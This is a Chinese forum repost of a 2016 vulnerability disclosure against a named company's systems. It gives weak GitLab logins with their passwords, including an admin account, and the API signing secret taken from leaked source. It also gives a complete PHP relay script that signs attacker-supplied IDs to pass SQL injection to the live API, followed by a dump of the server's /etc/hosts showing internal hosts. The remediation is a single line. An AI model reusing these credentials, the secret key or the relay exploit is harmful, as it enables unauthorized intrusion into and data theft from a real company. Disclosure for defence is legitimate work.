HanDs
管理员

[7月漏洞公开] 北京黑米git弱口令导致SQL注入(参数签名中转注射案例) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

.

详细说明:

http://git.747.cn/users/sign_in 跑了一下

zhangxuan 123456

还有个管理员权限的 liuchao 123456

可以添加用户和添加进项目小组里面

泄漏各种项目源码

QQ截图20160603190737.jpg



QQ截图20160603190720.jpg



QQ截图20160603190744.jpg



http://git.747.cn/zhangxuan/heimilink_api/blob/master/heimi_api%20interface.txt

发现了一个这个文档 结合前面提交的注入觉得一定有注入.

由于其他的要验证登录了没有就只有第4个了

4. 获取用户渠道编号



访问地址: 根域名 + /user/info/getchannelid?hm_uid=[用户ID]&hm_dateline=[时间截]&hm_sign=[数字签名]

签名生成方法:



$sign = sha1( 用户ID . SEC秘钥 . 时间截) ;

示例: http://hmapi.showboom.cn/user/info/getchannelid?hm_uid=17&hm_dateline=1453345011&hm_sign=e9ed25d7cb259a4ed9eb1df1aaddeaa150622072





嗯 hm_uid hm_dateline知道

SECSEC秘钥在php里面

http://git.747.cn/zhangxuan/heimilink_api/blob/master/application/modules/User/controllers/Info.php

加密算法知道了

我们写个脚本

QQ截图20160603185421.jpg



QQ截图20160603185504.jpg



嗯存在注入

写个中转吧.

漏洞证明:

code 区域
<?php
$SEC = '0d70d259cd54875a44654f5e856df327';
$userid = stripslashes($_GET['userid']);
$dateline= '1453345011';
$sign = sha1( $userid . $SEC . $dateline) ;
$uri = 'https://hmapi.showboom.cn/user/info/getchannelid?hm_uid='.$userid.'&hm_dateline=1453345011&hm_sign='.$sign;
$header = array();
$ch = curl_init ();
curl_setopt ( $ch, CURLOPT_URL, $uri );
curl_setopt ( $ch, CURLOPT_HEADER, 1 );
curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, 1 );
//https
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
$return = curl_exec ( $ch );
curl_close ( $ch );
{echo $return;}
?>



user

QQ截图20160603190050.jpg



读取/etc/hosts

code 区域
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
10.0.2.251 a1801
10.0.2.10 a1802
10.0.2.11 a1803
10.0.2.12 a1804
10.0.2.13 a1805
10.0.2.14 a1806
10.0.2.15 a1807
10.0.2.16 a1808
10.0.2.17 a1809
10.0.2.18 a1810
10.0.3.10 a1701
10.0.3.11 a1702
10.0.3.12 a1703
10.0.3.13 a1704
10.0.3.14 a1705
10.0.3.15 a1706
10.0.3.16 a1707
10.0.3.17 a1708
10.0.3.18 a1709
10.0.3.19 a1710
10.0.3.20 a1711
10.0.3.21 a1712
10.0.2.19 a1602
10.0.2.20 a1603
10.0.2.6 a1604
10.0.2.8 a1605
10.0.2.7 a1606
10.0.2.21 a1607
10.0.2.22 a1608
10.0.2.23 a1609
10.0.2.24 a1610
10.0.2.25 a1611
10.0.3.51 a1501
10.0.3.52 a1502
10.0.3.53 a1503
10.0.3.54 a1504
10.0.3.55 a1505
10.0.3.56 a1506
10.0.3.57 a1507
10.0.3.58 a1508
10.0.3.59 a1509



内网服务器好多.

QQ截图20160603190503.jpg





修复方案:

额 看了一下源码发现几乎都没有过滤或者参数化查询语句.


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
北京 诿
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复